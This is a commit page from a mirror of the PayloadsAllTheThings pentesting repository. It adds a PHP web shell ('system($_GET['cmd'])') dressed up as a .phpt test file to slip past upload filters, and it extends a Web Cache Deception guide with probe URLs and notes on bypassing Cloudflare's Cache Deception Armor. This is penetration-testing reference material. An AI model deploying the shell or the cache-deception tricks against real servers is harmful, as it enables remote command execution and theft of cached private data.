ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-19 10:56:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Web Cache Deception + phpt file format

Browse Source
This commit is contained in:
Swissky 2024-01-11 12:20:25 +01:00
parent 4b77292aeb
commit c852118ec8
3 changed files with 37 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
Upload Insecure Files/Extension PHP/shell.phpt
View File

@ -1 +1,9 @@
<?php echo "Shell";system($_GET['cmd']); ?> --TEST--
echo - basic test for echo language construct
--FILE--
<?php
echo 'This works ', 'and takes args!';
echo "Shell";system($_GET['cmd']);
?>
--EXPECT--
This works and takes args!

1
Upload Insecure Files/README.md
View File

@ -219,3 +219,4 @@ Upload the XML file to `$JETTY_BASE/webapps/`
* [Jetty Features for Hacking Web Apps - September 15, 2022 - Mikhail Klyuchnikov](https://swarm.ptsecurity.com/jetty-features-for-hacking-web-apps/) * [Jetty Features for Hacking Web Apps - September 15, 2022 - Mikhail Klyuchnikov](https://swarm.ptsecurity.com/jetty-features-for-hacking-web-apps/)
* [Inyección de código en imágenes subidas y tratadas con PHP-GD - Spanish Resource - hackplayers](https://www.hackplayers.com/2020/03/inyeccion-de-codigo-en-imagenes-php-gd.html) * [Inyección de código en imágenes subidas y tratadas con PHP-GD - Spanish Resource - hackplayers](https://www.hackplayers.com/2020/03/inyeccion-de-codigo-en-imagenes-php-gd.html)
* [A New Vector For “Dirty” Arbitrary File Write to RCE - Doyensec - Maxence Schmitt and Lorenzo Stella](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html) * [A New Vector For “Dirty” Arbitrary File Write to RCE - Doyensec - Maxence Schmitt and Lorenzo Stella](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)
* [PHP Internals Book - THE .PHPT FILE STRUCTURE](https://www.phpinternalsbook.com/tests/phpt_file_structure.html)

28
Web Cache Deception/README.md
View File

@ -1,6 +1,8 @@
# Web Cache Deception # Web Cache Deception
> Web Cache Deception (WCD) is a security vulnerability that occurs when a web server or caching proxy misinterprets a client's request for a web resource and subsequently serves a different resource, which may often be more sensitive or private, after caching it. > Web Cache Deception (WCD) is a security vulnerability that occurs when a web server or caching proxy misinterprets a client's request for a web resource and subsequently serves a different resource, which may often be more sensitive or private, after caching it.
## Summary ## Summary
* [Tools](#tools) * [Tools](#tools)
@ -17,6 +19,7 @@
* [PortSwigger/param-miner](https://github.com/PortSwigger/param-miner) * [PortSwigger/param-miner](https://github.com/PortSwigger/param-miner)
> This extension identifies hidden, unlinked parameters. It's particularly useful for finding web cache poisoning vulnerabilities. > This extension identifies hidden, unlinked parameters. It's particularly useful for finding web cache poisoning vulnerabilities.
## Exploit ## Exploit
Example of Web Cache Deception: Example of Web Cache Deception:
@ -80,6 +83,16 @@ Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page
``` ```
## Tricks
The following URL format are a good starting point to check for "cache" feature.
* https://example.com/app/conversation/.js?test
* https://example.com/app/conversation/;.js
* https://example.com/home.php/non-existent.css
## CloudFlare Caching ## CloudFlare Caching
CloudFlare caches the resource when the `Cache-Control` header is set to `public` and `max-age` is greater than 0. CloudFlare caches the resource when the `Cache-Control` header is set to `public` and `max-age` is greater than 0.
@ -87,6 +100,10 @@ CloudFlare caches the resource when the `Cache-Control` header is set to `public
- The Cloudflare CDN does not cache HTML by default - The Cloudflare CDN does not cache HTML by default
- Cloudflare only caches based on file extension and not by MIME type: [cloudflare/default-cache-behavior](https://developers.cloudflare.com/cache/about/default-cache-behavior/) - Cloudflare only caches based on file extension and not by MIME type: [cloudflare/default-cache-behavior](https://developers.cloudflare.com/cache/about/default-cache-behavior/)
In Cloudflare CDN, one can implement a `Cache Deception Armor`, it is not enabled by default.
When the `Cache Deception Armor` is enabled, the rule will verify a URL's extension matches the returned `Content-Type`.
CloudFlare has a list of default extensions that gets cached behind their Load Balancers. CloudFlare has a list of default extensions that gets cached behind their Load Balancers.
| | | | | | | | | | | | | | | |
@ -101,11 +118,18 @@ CloudFlare has a list of default extensions that gets cached behind their Load B
| CLASS | EXE | JS | PICT | SWF | XLS | XLSX | | CLASS | EXE | JS | PICT | SWF | XLS | XLSX |
Exceptions and bypasses:
* If the returned Content-Type is application/octet-stream, the extension does not matter because that is typically a signal to instruct the browser to save the asset instead of to display it.
* Cloudflare allows .jpg to be served as image/webp or .gif as video/webm and other cases that we think are unlikely to be attacks.
* [Bypassing Cache Deception Armor using .avif extension file - fixed](https://hackerone.com/reports/1391635)
## Labs ## Labs
* [PortSwigger Labs for Web cache deception](https://portswigger.net/web-security/all-labs#web-cache-poisoning) * [PortSwigger Labs for Web cache deception](https://portswigger.net/web-security/all-labs#web-cache-poisoning)
## References ## References
* [Web Cache Deception Attack - Omer Gil](http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html) * [Web Cache Deception Attack - Omer Gil](http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html)
@ -116,4 +140,6 @@ CloudFlare has a list of default extensions that gets cached behind their Load B
- [Exploiting cache design flaws](https://portswigger.net/web-security/web-cache-poisoning/exploiting-design-flaws) - [Exploiting cache design flaws](https://portswigger.net/web-security/web-cache-poisoning/exploiting-design-flaws)
- [Exploiting cache implementation flaws](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws) - [Exploiting cache implementation flaws](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws)
* [OpenAI Account Takeover - @naglinagli - Mar 24, 2023](https://twitter.com/naglinagli/status/1639343866313601024) * [OpenAI Account Takeover - @naglinagli - Mar 24, 2023](https://twitter.com/naglinagli/status/1639343866313601024)
* [Shockwave Identifies Web Cache Deception and Account Takeover Vulnerability affecting OpenAI's ChatGPT - Gal Nagli](https://www.shockwave.cloud/blog/shockwave-works-with-openai-to-fix-critical-chatgpt-vulnerability) * [Shockwave Identifies Web Cache Deception and Account Takeover Vulnerability affecting OpenAI's ChatGPT - Gal Nagli](https://www.shockwave.cloud/blog/shockwave-works-with-openai-to-fix-critical-chatgpt-vulnerability)
* [Cache Deception Armor - Cloudflare](https://developers.cloudflare.com/cache/cache-security/cache-deception-armor/)
* [How I Test For Web Cache Vulnerabilities + Tips And Tricks - bombon - Jul 21, 2022](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9)